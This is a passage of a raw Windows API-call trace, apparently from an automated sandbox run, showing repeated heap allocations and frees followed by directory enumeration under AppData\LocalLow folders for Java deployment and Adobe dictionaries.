dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.446] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="tmp\\" [0061.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0061.446] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0061.447] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0061.447] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0061.447] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.447] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.447] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.447] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.447] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.447] PathFindFileNameW (pszPath="") returned="" [0061.447] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.447] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.447] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfaeead90, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 1 [0061.447] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfaeead90, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 0 [0061.447] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.447] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.448] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.448] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\") returned="all\\" [0061.448] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.448] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.448] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.448] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.448] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.448] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.448] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.448] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.448] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.448] PathFindFileNameW (pszPath="") returned="" [0061.448] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.449] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.449] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.449] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.449] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.449] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.449] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\") returned="brt\\" [0061.449] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.449] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.449] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.449] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.450] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.450] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.450] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.450] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.450] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.450] PathFindFileNameW (pszPath="") returned="" [0061.450] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, 